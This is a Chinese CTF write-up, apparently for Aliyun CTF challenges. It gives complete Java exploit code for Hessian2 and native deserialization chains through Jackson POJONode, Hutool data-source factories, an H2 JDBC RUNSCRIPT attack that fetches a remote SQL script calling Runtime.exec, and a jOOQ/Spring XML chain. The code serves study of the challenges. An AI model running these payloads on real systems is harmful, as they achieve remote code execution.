agent
jdk17依赖有h2思路清晰打jdbc attack
<dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId> </dependency> <!-- https://mvnrepository.com/artifact/com.alibaba/hessian-lite --> <dependency> <groupId>com.alibaba</groupId> <artifactId>hessian-lite</artifactId> <version>3.2.13</version> </dependency> <dependency> <groupId>cn.hutool</groupId> <artifactId>hutool-all</artifactId> <version>5.8.16</version> </dependency> <!-- https://mvnrepository.com/artifact/com.h2database/h2 --> <dependency> <groupId>com.h2database</groupId> <artifactId>h2</artifactId> <version>2.2.224</version> </dependency>
项目
Deserial_Sink_With_JDBC
jdbc-attack
fork了一个师傅的github
发现没有
su18
H2 RCE
Spring Boot H2 console,by changing the connection url of h2 database,we can make spring boot run script from the remote.
jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8000/poc.sql'
And then prepare a statemate something like below to declare and call the Runtime.getRuntime().exec():
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "su18";}';CALL EXEC ('open -a Calculator.app')
看到了h2 rce
String connectionUrl = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8001/poc.sql'"; // getConnection 触发漏洞 Connection connection = DriverManager.getConnection(connectionUrl); connection.close();
安装h2数据库
h2数据库
python -m http.server 8001
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "su18";}';CALL EXEC ('calc')
可以拿到calc
使用codeql查询sink
使用尝试
还有一个把cn.h2%修改为cn.hutool%,找到
String connectionUrl = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8001/poc.sql'";Setting setting = new Setting();setting.setCharset(null);setting.set("url",connectionUrl);Unsafe unsafe = UnSafeTools.getUnsafe();PooledDSFactory pooledDSFactory = (PooledDSFactory) unsafe.allocateInstance(PooledDSFactory.class);UnSafeTools.setObject(pooledDSFactory,pooledDSFactory.getClass().getSuperclass().getDeclaredField("setting"),setting);UnSafeTools.setObject(pooledDSFactory,pooledDSFactory.getClass().getSuperclass().getDeclaredField("dsMap"),new SafeConcurrentHashMap<>());
这样就查找能触发到toString的类来触发jackson的getter去调用getConnection
由于是hessian反序列化会触发map的put方法,
我们寻找一条到pojonode#toString的链子, 但是Hessian 的反序列化受module的影响,但是原生的反序列化并不受module 的影响,所以hessian后面就要用到Bean的原生反序列化了
发现codeql显示能调用到但是
有限制,我们查找不继承这些接口的toString能触发pojonode#toString的方法,而且必须是jdk原生类
不然这个就满足了MutableObj
String#valueof和Object都满足
这样即可找到
确实可以触发
所以就是hessian2#readObject->AtomicReference#toString->String#valueof->POJONode#toString->h2的jdbc attack
使用codeql查找
hessian反序列化漏洞,是map反序列化,当他的_type不是null,且不是map和sortedMap时候,调用构造函数实例化
这时候生成了一个JSONObject变量,但是值为空
可以看到map将值put进去了两次反序列化
所以我们可以理解为,第一段Hessian2先创建一个JSONObject,
然后将两次反序列化的值作为key和value值
如何指定hessian2创建JSONObject呢
hessian2反序列化的序列化函数可以传入指定类型进去,并且设置this.buffer[this.offset++]是77这样反序列化的时候就会获取_type值为77
但是writeType有条件限制
private void writeType(String type) throws IOException { this.flushIfFull(); int len = type.length(); if (len == 0) { throw new IllegalArgumentException("empty type is not allowed"); } else { if (this._typeRefs == null) { this._typeRefs = new HashMap(); } Integer typeRefV = (Integer)this._typeRefs.get(type); if (typeRefV != null) { int typeRef = typeRefV; this.writeInt(typeRef); } else { this._typeRefs.put(type, this._typeRefs.size()); this.writeString(type); } }
}
在HashMap里面push了一个type进去
这时候反序列化
调用了this.read()
public final int read() throws IOException { return this._length <= this._offset && !this.readBuffer() ? -1 : this._buffer[this._offset++] & 255;
} private final boolean readBuffer() throws IOException { byte[] buffer = this._buffer; int offset = this._offset; int length = this._length; if (offset < length) { System.arraycopy(buffer, offset, buffer, 0, length - offset); offset = length - offset; } else { offset = 0; } int len = this._is.read(buffer, offset, 256 - offset); if (len <= 0) { this._length = offset; this._offset = 0; return offset > 0; } else { this._length = offset + len; this._offset = 0; return true; }
}
读取缓冲区的值当this.readBuffer返回值为true的时候调用this._buffer[this._offset++] & 255;
所以_offset这时候就为1
因为上面的writeBeginMap将tag设置为了77
通过readType读取
由于_offset为1,所以值是25
将offset-1,这时候offset读取就从2变成了1
在进入读取
这时候tag值就为25,_offset值就为2
设置_sbuf的长度为0,设置_chunkLength长度为25,也就是cn.hutool.json.JSONObject的长度
所以后面就是从buf的25长度后面读25个字节,也就是把Type读出来cn.hutool.json.JSONObject
这时候我们知道如何指定type了,继续跟着往后面走
case 77: type = this.readType(); return this.findSerializerFactory().readMap(this, type);
public Object readMap(AbstractHessianInput in, String type, Class<?> expectKeyType, Class<?> expectValueType) throws HessianProtocolException, IOException { Deserializer deserializer = this.getDeserializer(type); if (deserializer != null) { return deserializer.readMap(in); } else if (this._hashMapDeserializer != null) { return this._hashMapDeserializer.readMap(in, expectKeyType, expectValueType); } else { this._hashMapDeserializer = new MapDeserializer(HashMap.class); return this._hashMapDeserializer.readMap(in, expectKeyType, expectValueType); }
}
进入了这边, this.getDeserializer(type)获取了类型的反序列化
也就是获取了
当类型
public Object readMap(AbstractHessianInput in, Class<?> expectKeyType, Class<?> expectValueType) throws IOException { Object map; if (this._type == null) { map = new HashMap(); } else if (this._type.equals(Map.class)) { map = new HashMap(); } else if (this._type.equals(SortedMap.class)) { map = new TreeMap(); } else { try { map = (Map)this._ctor.newInstance(); } catch (Exception var6) { throw new IOExceptionWrapper(var6); } } in.addRef(map); this.doReadMap(in, (Map)map, expectKeyType, expectValueType); in.readEnd(); return map}
这样就能newInstance了
在newInstance后调用了
this.doReadMap(in, (Map)map, expectKeyType, expectValueType);
in.isEnd()将buffer读取到了
也就是读完类名的值,也就是8,8也就是我们key的长度,再次反序列化,将offset的值就到
value反序列化开始的地方
获取到我们输入的key
再次反序列化获取我们的value,就是走正常反序列化了
JSONObject调用put
然后JSONObject调用set
到最后调用到这个
public JSONObject set(String key, Object value, Filter<MutablePair<String, Object>> filter, boolean checkDuplicate) throws JSONException { if (null == key) { return this; } else { if (null != filter) { MutablePair<String, Object> pair = new MutablePair(key, value); if (!filter.accept(pair)) { return this; } key = (String)pair.getKey(); value = pair.getValue(); } boolean ignoreNullValue = this.config.isIgnoreNullValue(); if (ObjectUtil.isNull(value) && ignoreNullValue) { this.remove(key); } else { if (checkDuplicate && this.containsKey(key)) { throw new JSONException("Duplicate key \"{}\"", new Object[]{key}); } super.put(key, JSONUtil.wrap(InternalJSONUtil.testValidity(value), this.config)); } return this; }
}
调用了Object的toString也就是,
调用他的get函数
返回值也就是POJONode
String.ValueOf也就调用了value的toString
所以我们的思路就是
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
Hessian2Output hessian2Output = new Hessian2Output(byteArrayOutputStream); hessian2Output.writeMapBegin(JSONObject.class.getName());
hessian2Output.writeObject("whatever");POJONode pojoNode = new POJONode(bean); Object object = new AtomicReference<>(pojoNode);
hessian2Output.writeObject(object);
hessian2Output.writeMapEnd();
hessian2Output.close();
这样就能触发pojonode
所以payload就是
package com.aliyunctf.agent;
import cn.hutool.core.map.SafeConcurrentHashMap;
import cn.hutool.db.ds.pooled.PooledDSFactory;
import cn.hutool.json.JSONObject;
import cn.hutool.setting.Setting;
import com.alibaba.com.caucho.hessian.io.Hessian2Input;
import com.alibaba.com.caucho.hessian.io.Hessian2Output;
import com.aliyunctf.agent.other.Bean;
import com.fasterxml.jackson.databind.node.POJONode;
import com.n1ght.serial.SerialTools;
import com.n1ght.unsafe.UnSafeTools;
import sun.misc.Unsafe;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.util.Base64;
import java.util.concurrent.atomic.AtomicReference;public class Main {public static void main(String[] args) throws Exception {
//--add-opens java.base/java.math=ALL-UNNAMED --add-opens java.base/java.lang=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.util.concurrent.atomic=ALL-UNNAMED --add-opens java.base/java.security=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMEDString connectionUrl = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8001/poc.sql'";Setting setting = new Setting();setting.setCharset(null);setting.set("url",connectionUrl);Unsafe unsafe = UnSafeTools.getUnsafe();PooledDSFactory pooledDSFactory = (PooledDSFactory) unsafe.allocateInstance(PooledDSFactory.class);UnSafeTools.setObject(pooledDSFactory,pooledDSFactory.getClass().getSuperclass().getDeclaredField("setting"),setting);UnSafeTools.setObject(pooledDSFactory,pooledDSFactory.getClass().getSuperclass().getDeclaredField("dsMap"),new SafeConcurrentHashMap<>());Bean bean = new Bean();UnSafeTools.setObject(bean,Bean.class.getDeclaredField("data"), Base64.getDecoder().decode(SerialTools.base64Serial(pooledDSFactory)));ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();Hessian2Output hessian2Output = new Hessian2Output(byteArrayOutputStream);hessian2Output.writeMapBegin(JSONObject.class.getName());hessian2Output.writeObject("whatever");POJONode pojoNode = new POJONode(bean);Object object = new AtomicReference<>(pojoNode);hessian2Output.writeObject(object);hessian2Output.writeMapEnd();hessian2Output.close();ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());Hessian2Input hessian2Input = new Hessian2Input((InputStream)byteArrayInputStream);hessian2Input.readObject();}
}
但是为什么jackson的toString触发getObject后,就能再次触发PooledDSFactory的getter
BeanSerializerBase#serializeFields
在这边看到了BeanPropertyWriter#serializeAsField
Object value = this._accessorMethod == null ? this._field.get(bean) : this._accessorMethod.invoke(bean, (Object[])null);if (value == null) {if (this._suppressableValue == null || !prov.includeFilterSuppressNulls(this._suppressableValue)) {if (this._nullSerializer != null) {gen.writeFieldName(this._name);this._nullSerializer.serialize((Object)null, gen, prov);}}} else {JsonSerializer<Object> ser = this._serializer;if (ser == null) {Class<?> cls = value.getClass();PropertySerializerMap m = this._dynamicSerializers;ser = m.serializerFor(cls);if (ser == null) {ser = this._findAndAddDynamic(m, cls, prov);}}if (this._suppressableValue != null) {if (MARKER_FOR_EMPTY == this._suppressableValue) {if (ser.isEmpty(prov, value)) {return;}} else if (this._suppressableValue.equals(value)) {return;}}if (value != bean || !this._handleSelfReference(bean, gen, prov, ser)) {gen.writeFieldName(this._name);if (this._typeSerializer == null) {ser.serialize(value, gen, prov);} else {ser.serializeWithType(value, gen, prov, this._typeSerializer);}}}
当获取值后,对value再次进行序列化
Object value = this._accessorMethod == null ? this._field.get(bean) : this._accessorMethod.invoke(bean, (Object[])null); //这边就是getter后的值
也就是调用getObject后获取的值
然后对他获取的值再次进行序列化也就再次走到了这
也就是调用了PooledDSFactory的getConnection
我们之前上面找的JdbcDataSource有问题,我修改了什么地方让他成功呢
问题就在
有debug问题,fastjson的序列化问题是
Error: java.io.NotSerializableException: org.h2.jdbcx.JdbcDataSourceFactory
这样导致trace设置不了,debugCodeCall会进行判断,导致无法执行connect
所以我们使用
H2DataSource jdbcDataSource = (H2DataSource) unsafe.allocateInstance(H2DataSource.class);
unsafe.allocateInstance实例化这样不会带不可序列化的数据,我们set即可
我重写的类
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//package com.aliyunctf.agent;import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.PrintWriter;
import java.io.Serializable;
import java.lang.reflect.Field;
import java.sql.Connection;
import java.sql.SQLException;
import java.util.Properties;
import java.util.logging.Logger;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.naming.StringRefAddr;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.DataSource;
import javax.sql.PooledConnection;
import javax.sql.XAConnection;
import javax.sql.XADataSource;
import org.h2.jdbc.JdbcConnection;
import org.h2.jdbcx.JdbcDataSourceBackwardsCompat;
import org.h2.jdbcx.JdbcDataSourceFactory;
import org.h2.jdbcx.JdbcXAConnection;
import org.h2.message.DbException;
import org.h2.message.Trace;
import org.h2.message.TraceObject;
import org.h2.message.TraceSystem;
import org.h2.util.StringUtils;public final class H2DataSource extends TraceObject implements XADataSource, DataSource, ConnectionPoolDataSource, Serializable, Referenceable, JdbcDataSourceBackwardsCompat {private static final long serialVersionUID = 1288136338451857771L;private JdbcDataSourceFactory factory;private transient PrintWriter logWriter;private int loginTimeout;private String userName = "";private char[] passwordChars = new char[0];private String url = "";private String description;private Trace trace;public Trace getTrace() {return trace;}public void setTrace(Trace trace) {this.trace = trace;}public H2DataSource(){this.initFactory();int var1 = getNextId(12);this.setTrace(trace, 12, var1);}private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {this.initFactory();var1.defaultReadObject();}private void initFactory() {this.factory = new JdbcDataSourceFactory();}public int getLoginTimeout() {return this.loginTimeout;}public void setLoginTimeout(int var1) {this.loginTimeout = var1;}public PrintWriter getLogWriter() {return this.logWriter;}public void setLogWriter(PrintWriter var1) {this.debugCodeCall("setLogWriter(out)");this.logWriter = var1;}public Connection getConnection() throws SQLException {return new JdbcConnection(this.url, (Properties)null, this.userName, StringUtils.cloneCharArray(this.passwordChars), false);}public Connection getConnection(String var1, String var2) throws SQLException {if (this.isDebugEnabled()) {this.debugCode("getConnection(" + quote(var1) + ", \"\")");}return new JdbcConnection(this.url, (Properties)null, var1, var2, false);}public String getURL() {this.debugCodeCall("getURL");return this.url;}public void setURL(String var1) {this.url = var1;}public String getUrl() {this.debugCodeCall("getUrl");return this.url;}public void setUrl(String var1) {this.debugCodeCall("setUrl", var1);this.url = var1;}public void setPassword(String var1) {this.debugCodeCall("setPassword", "");this.passwordChars = var1 == null ? null : var1.toCharArray();}public void setPasswordChars(char[] var1) {if (this.isDebugEnabled()) {this.debugCode("setPasswordChars(new char[0])");}this.passwordChars = var1;}private static String convertToString(char[] var0) {return var0 == null ? null : new String(var0);}public String getPassword() {this.debugCodeCall("getPassword");return convertToString(this.passwordChars);}public String getUser() {this.debugCodeCall("getUser");return this.userName;}public void setUser(String var1) {this.debugCodeCall("setUser", var1);this.userName = var1;}public String getDescription() {this.debugCodeCall("getDescription");return this.description;}public void setDescription(String var1) {this.debugCodeCall("getDescription", var1);this.description = var1;}public Reference getReference() {this.debugCodeCall("getReference");String var1 = JdbcDataSourceFactory.class.getName();Reference var2 = new Reference(this.getClass().getName(), var1, (String)null);var2.add(new StringRefAddr("url", this.url));var2.add(new StringRefAddr("user", this.userName));var2.add(new StringRefAddr("password", convertToString(this.passwordChars)));var2.add(new StringRefAddr("loginTimeout", Integer.toString(this.loginTimeout)));var2.add(new StringRefAddr("description", this.description));return var2;}public XAConnection getXAConnection() throws SQLException {this.debugCodeCall("getXAConnection");return null;}public XAConnection getXAConnection(String var1, String var2) throws SQLException {if (this.isDebugEnabled()) {this.debugCode("getXAConnection(" + quote(var1) + ", \"\")");}return null;}public PooledConnection getPooledConnection() throws SQLException {this.debugCodeCall("getPooledConnection");return this.getXAConnection();}public PooledConnection getPooledConnection(String var1, String var2) throws SQLException {if (this.isDebugEnabled()) {this.debugCode("getPooledConnection(" + quote(var1) + ", \"\")");}return this.getXAConnection(var1, var2);}public <T> T unwrap(Class<T> var1) throws SQLException {try {if (this.isWrapperFor(var1)) {return (T) this;} else {throw DbException.getInvalidValueException("iface", var1);}} catch (Exception var3) {throw this.logAndConvert(var3);}}public boolean isWrapperFor(Class<?> var1) throws SQLException {return var1 != null && var1.isAssignableFrom(this.getClass());}public Logger getParentLogger() {return null;}public String toString() {return this.getTraceObjectName() + ": url=" + this.url + " user=" + this.userName;}
}
payload:
String connectionUrl = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8001/poc.sql'";Bean bean = new Bean();
// Setting setting = new Setting();
// setting.setCharset(null);
// setting.set("url",connectionUrl);Unsafe unsafe = UnSafeTools.getUnsafe();
// PooledDSFactory pooledDSFactory = (PooledDSFactory) unsafe.allocateInstance(PooledDSFactory.class);
// UnSafeTools.setObject(pooledDSFactory,pooledDSFactory.getClass().getSuperclass().getDeclaredField("setting"),setting);
// UnSafeTools.setObject(pooledDSFactory,pooledDSFactory.getClass().getSuperclass().getDeclaredField("dsMap"),new SafeConcurrentHashMap<>());
// UnSafeTools.setObject(bean,Bean.class.getDeclaredField("data"), Base64.getDecoder().decode(SerialTools.base64Serial(pooledDSFactory)));H2DataSource jdbcDataSource = (H2DataSource) unsafe.allocateInstance(H2DataSource.class);jdbcDataSource.setURL(connectionUrl);jdbcDataSource.setLoginTimeout(5);Object o = SourceTools.getterJacksonProxy(jdbcDataSource, DataSource.class);UnSafeTools.setObject(bean,Bean.class.getDeclaredField("data"), Base64.getDecoder().decode(SerialTools.base64Serial(o)));ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();Hessian2Output hessian2Output = new Hessian2Output(byteArrayOutputStream);hessian2Output.writeMapBegin(JSONObject.class.getName());hessian2Output.writeObject("whatever");POJONode pojoNode = new POJONode(bean);Object object = new AtomicReference<>(pojoNode);hessian2Output.writeObject(object);hessian2Output.writeMapEnd();hessian2Output.close();ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());Hessian2Input hessian2Input = new Hessian2Input((InputStream)byteArrayInputStream);hessian2Input.readObject();
这样拿取shell就可达到第二条,像第二条发送payload去打通
第二条的trace一直没加载进去,很奇怪,原生类序列化能不能打进去呢
之前继承的SimpleDSFactory也可以
package com.aliyunctf.agent;
import cn.hutool.core.map.SafeConcurrentHashMap;
import cn.hutool.db.ds.c3p0.C3p0DSFactory;
import cn.hutool.db.ds.druid.DruidDSFactory;
import cn.hutool.db.ds.jndi.JndiDSFactory;
import cn.hutool.db.ds.pooled.PooledDSFactory;
import cn.hutool.db.ds.simple.SimpleDSFactory;
import cn.hutool.db.ds.tomcat.TomcatDSFactory;
import cn.hutool.json.JSONObject;
import cn.hutool.setting.Setting;
import com.alibaba.com.caucho.hessian.io.Hessian2Input;
import com.alibaba.com.caucho.hessian.io.Hessian2Output;
import com.aliyunctf.agent.other.Bean;
import com.fasterxml.jackson.databind.node.POJONode;
import com.n1ght.serial.SerialTools;
import com.n1ght.source.SourceTools;
import com.n1ght.unsafe.UnSafeTools;
import org.h2.jdbcx.JdbcDataSource;
import org.h2.jdbcx.JdbcDataSourceFactory;
import org.h2.message.Trace;
import org.h2.message.TraceObject;
import org.h2.message.TraceSystem;
import sun.misc.Unsafe;
import javax.sql.DataSource;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.concurrent.atomic.AtomicReference;public class Main {public static void main(String[] args) throws Exception {
//--add-opens java.base/java.math=ALL-UNNAMED --add-opens java.base/java.lang=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.util.concurrent.atomic=ALL-UNNAMED --add-opens java.base/java.security=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMED --add-opens java.desktop/javax.swing.undo=ALL-UNNAMED --add-opens java.desktop/javax.swing.event=ALL-UNNAMED --add-opens java.xml/com.sun.org.apache.xpath.internal.objects=ALL-UNNAMEDString connectionUrl = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8001/poc.sql'";Bean bean = new Bean();Setting setting = new Setting();setting.setCharset(null);setting.set("url",connectionUrl);Unsafe unsafe = UnSafeTools.getUnsafe();SimpleDSFactory pooledDSFactory = (SimpleDSFactory) unsafe.allocateInstance(SimpleDSFactory.class);UnSafeTools.setObject(pooledDSFactory,pooledDSFactory.getClass().getSuperclass().getDeclaredField("setting"),setting);UnSafeTools.setObject(pooledDSFactory,pooledDSFactory.getClass().getSuperclass().getDeclaredField("dsMap"),new SafeConcurrentHashMap<>());UnSafeTools.setObject(bean,Bean.class.getDeclaredField("data"), Base64.getDecoder().decode(SerialTools.base64Serial(pooledDSFactory)));UnSafeTools.setObject(bean,Bean.class.getDeclaredField("data"), Base64.getDecoder().decode(SerialTools.base64Serial(pooledDSFactory)));ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();Hessian2Output hessian2Output = new Hessian2Output(byteArrayOutputStream);hessian2Output.writeMapBegin(JSONObject.class.getName());hessian2Output.writeObject("whatever");POJONode pojoNode = new POJONode(bean);Object object = new AtomicReference<>(pojoNode);hessian2Output.writeObject(object);hessian2Output.writeMapEnd();hessian2Output.close();ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());Hessian2Input hessian2Input = new Hessian2Input((InputStream)byteArrayInputStream);hessian2Input.readObject();}
}
只有开了--add-opens java.base/java.util.concurrent.atomic=ALL-UNNAMED
可以成功
server
使用查找,分了两步
即可
payload
package com.aliyunctf.server;import com.fasterxml.jackson.databind.node.POJONode;
import com.n1ght.reflect.ReflectTools;
import com.n1ght.serial.SerialTools;
import com.n1ght.unsafe.UnSafeTools;
import org.jooq.DataType;
import org.springframework.context.support.ClassPathXmlApplicationContext;import javax.swing.event.EventListenerList;
import javax.swing.undo.UndoManager;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Vector;public class Main {public static void main(String[] args) throws Exception {String url = "http://127.0.0.1:1234/poc.xml";Class clazz1 = Class.forName("org.jooq.impl.Dual");Constructor constructor1 = clazz1.getDeclaredConstructors()[0];constructor1.setAccessible(true);Object table = constructor1.newInstance();Class clazz2 = Class.forName("org.jooq.impl.TableDataType");Constructor constructor2 = clazz2.getDeclaredConstructors()[0];constructor2.setAccessible(true);Object tableDataType = constructor2.newInstance(table);Class clazz3 = Class.forName("org.jooq.impl.Val");Constructor constructor3 = clazz3.getDeclaredConstructor(Object.class, DataType.class, boolean.class);constructor3.setAccessible(true);Object val = constructor3.newInstance("whatever", tableDataType, false);Class clazz4 = Class.forName("org.jooq.impl.ConvertedVal");Constructor constructor4 = clazz4.getDeclaredConstructors()[0];constructor4.setAccessible(true);Object convertedVal = constructor4.newInstance(val, tableDataType);Object value = url;Class type = ClassPathXmlApplicationContext.class;UnSafeTools.setObject(val,val.getClass().getSuperclass().getDeclaredField("value"),value);UnSafeTools.setObject(tableDataType,tableDataType.getClass().getSuperclass().getDeclaredField("uType"),type);POJONode pojoNode = new POJONode(convertedVal);EventListenerList eventListenerList = new EventListenerList();UndoManager undoManager = new UndoManager();Vector vector = (Vector) ReflectTools.getFieldValue(undoManager, "edits");vector.add(pojoNode);ReflectTools.setFieldValue(eventListenerList, "listenerList", new Object[]{InternalError.class, undoManager});String s = SerialTools.base64Serial(eventListenerList);System.out.println(s);SerialTools.base64DeSerial(s);}}
![[论文阅读]Adversarial Autoencoders(aae)和代码](https://img-blog.csdnimg.cn/direct/5bf58b10769c45638e265c32869fe288.png)
